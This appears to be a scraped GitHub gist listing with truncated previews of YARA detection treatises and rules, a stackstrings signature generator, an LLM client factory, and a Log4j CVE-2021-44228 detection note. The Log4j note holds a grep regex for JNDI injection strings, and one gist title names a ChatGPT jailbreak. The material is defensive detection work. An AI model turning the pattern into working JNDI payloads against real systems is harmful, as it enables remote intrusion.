Karib0u
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from typing import Any, Dict, List, Type | |
| import instructor | |
| from anthropic import Anthropic | |
| from config.settings import get_settings | |
| from openai import OpenAI | |
| from pydantic import BaseModel, Field | |
| class LLMFactory: |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
coolaj86
/ ChatGPT-Dan-Jailbreak.md
Last active
July 18, 2025 18:49
notareverser
/ yara-rules-for-libraries.txt
Created
February 25, 2022 14:13
Brief treatise on the tradeoffs between YARA rules made from strings, code, and data
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Today for #100DaysOfYARA I want to further explore one of my favorite topics | |
| "How to reliably detect libraries", or how to identify that a particular program has linked or otherwise included a particular library. | |
| Detecting libraries (especially ones written in C) pose unique challenges compared to malware, to include: | |
| - libraries tend to be platform/architecture nonspecific | |
| - compilerisms overwhelm otherwise decent signal | |
| - copy/pasta and groupthink across libraries |
notareverser
/ code-signatures.treatise.txt
Created
February 15, 2022 16:22
A brief treatise on code-based YARA signatures
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Today for #100DaysOfYARA I want to dive in to some of the dirty secrets of creating/maintaining code-based YARA signatures | |
| Let's use SQLite3 as an example. Go get the source here (I prefer the amalgamation): | |
| https://sqlite.org/download.html | |
| I would like to reliably detect when a file is using SQLite. I often look at Windows executables, so I'm going to first concentrate on x86 programs that use this library. The easiest way to find them is to first concentrate on cleartext strings. In this case, I'm gonna pop over to VirusTotal and search for an easily-identifiable string: | |
| content: "failed to allocate %u bytes of memory" type:pe |
notareverser
/ generate-stackstrings-yara.py
Last active
May 14, 2022 17:15
Script to generate stackstrings YARA signatures for common implementation patterns
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys, string, struct | |
| def strByByte(_strval): | |
| strval = bytearray(_strval.encode()) | |
| for s in strval: yield s | |
| def strByDword(_strval): | |
| strval = bytearray(_strval.encode()) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule general_win_runkey_casing_anomaly : General | |
| { | |
| meta: | |
| author = "[email protected]" | |
| description = "Looks for files containing to a reference to the HKCU run key where the reference uses unusual casing." | |
| date = "2021-08-03" | |
| hash1 = "c20997c72508bc7340f4ec99fe9eb4f1ccde518e81bda66e7c86632f0748bffa" | |
| memory_suitable = 0 | |
| strings: |
Neo23x0
/ log4j_rce_detection.md
Last active
April 11, 2025 22:49
Log4j RCE CVE-2021-44228 Exploitation Detection
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
g-les
/ 100_days_of_yara.yar
Last active
September 26, 2022 01:01
100 Days of YARA to be updated with rules & ideas as the year progresses
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Goals for #100DaysofYARA: | |
| better understanding of bitwise operators | |
| use math module beyond general entropy of a section / resource | |
| position specific things beyond what PE module tells us | |
| do some funky stuff with hashing | |
| */ |
NewerOlder